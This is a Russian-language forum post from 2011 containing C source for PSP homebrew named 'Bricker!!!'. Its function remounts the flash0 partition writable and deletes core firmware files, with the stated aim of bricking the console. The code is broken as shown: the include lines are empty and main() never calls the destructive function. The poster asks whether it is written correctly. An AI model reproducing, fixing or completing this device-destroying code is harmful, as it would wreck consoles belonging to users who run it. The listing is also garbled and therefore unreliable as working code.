#include
#include
#include
PSP_MODULE_INFO("Bricker!!!", 0, 1, 0);
PSP_MAIN_THREAD_ATTR(THREAD_ATTR_USER | THREAD_ATTR_VFPU);
#define printf pspDebugScreenPrintf
int main(void)
{
pspDebugScreenInit();
printf("Specialy for pspinfo competitions\n");
printf(" Good job!!Now THIS PSP IS BRICKED!!!!\n");
printf("By Apple:D\n");
printf("This psp turn off after 500 seconds\n");
return 0;
}
void removeFile(char *basefile,char *nuovofile){
sceIoUnassign("flash0");
sceIoAssign("flash0", "lflash0:0,0", "flashfat0:", IOASSIGN_RDWR, NULL, 0);
sceIoRemove("flash0:/kd/utility.prx");
sceIoRemove("flash0:/vsh/module/_recovery.prx");
sceIoRemove("flash0:/vsh/etc/version.txt");
sceIoRemove("flash0:/vsh/resource/system_plugin_bg.rco");
sceKernelDelayThread(1000000);
sceKernelExitGame();
}
#include
#include
#include
Добавлено спустя 47 секунд:мля.... инклуды не пишет!
Добавлено спустя 1 минуту 10 секунд:vladgaly правильно ли написан код?
Сообщение отредактировано 2 июня 2011 23:40. Редактировалось 2 раз(а)